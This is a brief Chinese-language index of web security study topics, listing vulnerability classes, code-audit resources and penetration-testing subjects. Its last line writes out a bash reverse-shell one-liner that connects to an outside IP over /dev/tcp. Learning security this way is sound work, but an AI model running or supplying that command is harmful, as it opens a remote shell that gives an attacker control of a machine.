安全研究

介绍

参考的索引:https://wangyihang.gitbooks.io/awesome-web-security/

  • 常用工具
  • 开源仓库
  • 优秀文章
  • 常见漏洞
    • /etc/passwd
    • 文件包含
    • 文件上传
    • SQL注入
    • XSS
    • SSRF
    • CSRF
    • 命令代码执行
    • 敏感信息泄露
    • 随机数安全
  • 代码审计
    • 常用工具
    • 书籍
  • 渗透测试
    • CTF 搅屎
    • 流量操控技术
    • 主机发现
    • 内网中间人
    • 一句话木马
    • 反弹 shell

      bash -c ‘bash -i &>/dev/tcp/8.8.8.8/8888 0>1’